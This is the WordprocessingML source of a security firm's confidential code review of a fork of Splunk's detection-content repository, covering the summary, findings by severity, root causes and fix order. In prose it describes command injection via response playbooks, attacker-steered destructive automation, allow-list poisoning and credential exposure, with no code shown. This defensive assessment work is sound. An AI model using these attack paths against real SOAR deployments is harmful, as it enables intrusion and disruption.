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
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Secure Code Review Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="595959"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Splunk security_content (ESCU): Detection Content, SOAR Playbooks, CI/CD and Supply Chain</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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426"/>
        <w:gridCol w:w="6214"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2426" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6214" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2426" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Prepared by</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6214" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Bell Cyber STIRT (Security Threat Intelligence and Response Team)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2426" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6214" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bellcodereview/security_content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2426" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Commit reviewed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6214" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>develop @ 4cd62e8 (2026-09-08)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2426" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Assessment date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6214" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2026-10-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2426" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Report classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6214" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Confidential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2426" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unique findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6214" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>111 (0 Critical, 13 High, 31 Medium, 47 Low, 20 Informational)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="EAF1F8"/>
        <w:ind w:left="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Confidentiality notice.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> This document contains the results of an authorized security assessment and describes exploitable weaknesses. Distribution is restricted to the assessment sponsor and the engineering owners of the reviewed repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.1 Purpose and outcome</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Bell Cyber's Security Threat Intelligence and Response Team performed an authorized, full-coverage secure code review of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>security_content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> repository, Splunk's Enterprise Security Content Update source tree, under written permission to test. The review read every line of the 129 Python files, 9 GitHub Actions workflows, dashboards, app metadata, lookups and configuration, parsed all 2,169 detection rules, 41 baselines, 365 analytic stories and 86 response-playbook definitions with purpose-built checkers, ran six static-analysis and secret-scanning tools, audited the full 65-package build dependency tree, and executed sandboxed proofs of concept for every string-building weakness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The repository contains no deployable web application, so there was no running site to exercise through a browser. It is detection content plus response automation. The attack surface that matters is the data that flows into it: event fields chosen by whoever generates the activity Splunk observes, pull requests from any contributor, and dashboard URLs. Those three sources reach sensitive sinks in several places.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.2 Headline results</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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468"/>
        <w:gridCol w:w="1641"/>
        <w:gridCol w:w="5531"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1641" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Unique findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5531" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1641" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5531" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>No unauthenticated, no-precondition remote compromise was identified.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E26B0A"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1641" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5531" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Command execution reachable on managed endpoints through response playbooks, destructive response automation that attacker-chosen input can steer, a published cloud password, a CI expression-handling weakness, and a supply-chain path into the shared app-binaries bucket.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E6B800"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1641" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5531" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Query-building weaknesses across SPL, CrowdStrike FQL, LDAP, ServiceNow and the SOAR REST API; two dashboard SPL-handling issues; allow-list poisoning in stateful detections; an unlocked dependency tree; end-of-life platform components; licence-compliance gaps; and a credential written to logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1641" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5531" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Defence-in-depth gaps, sensitive identifiers in sample data, correctness defects that silently weaken detections, and hygiene issues.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1468" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1641" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5531" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Positive controls worth preserving, scanner false positives explained, and documentation and metadata notes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The eight parallel reviewers raised 125 findings; 14 were the same issue observed from a different angle and were merged, leaving </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>111 unique findings</w:t>
      </w:r>
      <w:r>
        <w:t>. Every finding carries a verified file and line reference, a reachability verdict, a proof of concept or reproduction path, a complete fixed code block, and mappings to CWE with the 2024 CWE Top 25 rank, OWASP Top 10 2021, MITRE ATT&amp;CK, NIST SP 800-53 Revision 5, NIST CSF 2.0, ISO/IEC 27001:2022 Annex A and the SANS Secure Coding Practices.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.3 Themes that drive the risk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The findings cluster into a small number of root causes. Fixing the cause resolves many findings at once.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted values are placed into command and query strings without neutralisation.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The same habit appears in shell and PowerShell commands sent to managed hosts, in Splunk searches, in CrowdStrike filter expressions, in LDAP and ServiceNow queries, in SOAR REST filter parameters, and in two dashboards. The repository already contains the correct pattern in a few places, the Jira playbook escapes its query language and one dashboard uses Splunk's safe-quote filter, so the remedy is to apply the existing good pattern everywhere rather than to invent anything new.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Destructive response automation lacks an approval step and an exclusion list.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Playbooks that disable accounts, isolate hosts, terminate processes, delete mail and block domains act directly on fields that originate in the triggering alert. Because an outside party can influence those fields, the automation can be pointed at a chosen target. The project already demonstrates the safe pattern: several playbooks require an analyst approval before acting, and one keeps a protected-account allow-list. The gap is that the pattern is applied inconsistently.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Stateful detections trust the data they are meant to judge.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A group of "first time seen" and "spike" detections write the values they observe into the same allow-list they read on the next run, so a single observation during a quiet window can suppress future alerts on the same indicator. The fix is to separate the component that maintains the baseline from the component that alerts, and to gate promotion into the baseline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>The build and supply chain are not pinned by content.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The dependency tree, several ad-hoc package installs, every third-party GitHub Action, dozens of app tarballs and two container images are referenced by mutable name rather than by hash or digest, and one scheduled job installs unpinned packages while holding long-lived cloud credentials. The current resolution is clean today, so this is a structural exposure rather than a live vulnerability, but it is the widest blast radius in the repository.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Sample data and one shipped credential disclose real information.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> One response playbook ships a fixed cloud console password, a scheduled job prints a derived session token into public build logs, and the CloudTrail and Entra sample logs retain genuine account identifiers, access-key identifiers and employee personal data despite a partial scrubbing effort.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.4 Positive controls observed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">The review also recorded controls that are working and should be preserved: the Jira playbook correctly escapes its query language; one dashboard and one detection use Splunk's safe-quote filter and should be the template for the rest; several playbooks gate destructive actions behind an analyst prompt; the build pins its one declared Python requirement; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yaml.safe_load</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is used throughout with no unsafe deserialization in shipped code; the labeler workflow uses the privileged trigger safely; the dependency resolution is free of known vulnerabilities as of the review date; every detection carries its filter macro; removed and deprecated content is correctly excluded from the build; and all 2,154 test-data URLs point to the official data repository over HTTPS. No private keys, live third-party tokens, connection strings or secret access keys exist in the tree or its reachable history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>1.5 Recommended sequence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
        <w:tab/>
        <w:t>Remove the shipped cloud password and generate a unique credential per run; stop printing the session token to build logs and rotate the affected account.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
        <w:tab/>
        <w:t>Apply the project's existing escaping and safe-quote patterns to every command and query that includes untrusted input, and add an approval step plus a protected-entity exclusion list before every destructive response action.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
        <w:tab/>
        <w:t>Separate baseline maintenance from alerting in the stateful detections and gate promotion into allow-lists.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>4.</w:t>
        <w:tab/>
        <w:t>Pin the dependency tree, the GitHub Actions, the container images and the app tarballs by hash or digest, move credential setup after package installation in the scheduled job, and add the pip and container ecosystems to automated updates.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:t>5.</w:t>
        <w:tab/>
        <w:t>Run the sample-log sanitiser, verify the exposed access keys are deactivated, and add secret scanning to the pre-commit hooks and the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Scope, Methodology and Limitations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 Target</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="864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4320"/>
        <w:gridCol w:w="4320"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0B5CAB"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>bellcodereview/security_content (fork of splunk/security_content, Splunk ES Content Update "ESCU")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Branch / commit reviewed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>develop @ 4cd62e811c5eddf1245c780d48823d7b38998566 (2026-09-08), reviewed on branch claude/nice-ride-5xnyc8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Repository size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>4,256 files, 48 MB (3,743 YAML, 171 JSON, 129 Python, 74 CSV, 5 Jupyter notebooks, 3 XML, 1 shell script)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Code reviewed line by line</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>129 Python files (86 SOAR playbooks, 35 SOAR custom functions, 8 CI/validation scripts), 9 GitHub Actions workflows, 3 dashboards, app template XML and metadata, 255 macro definitions, 103 lookup definitions and 74 CSV data files, 315 data-source fixtures, 11 JSON schemas, 5 notebooks, 86 playbook JSON definitions, all configuration files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
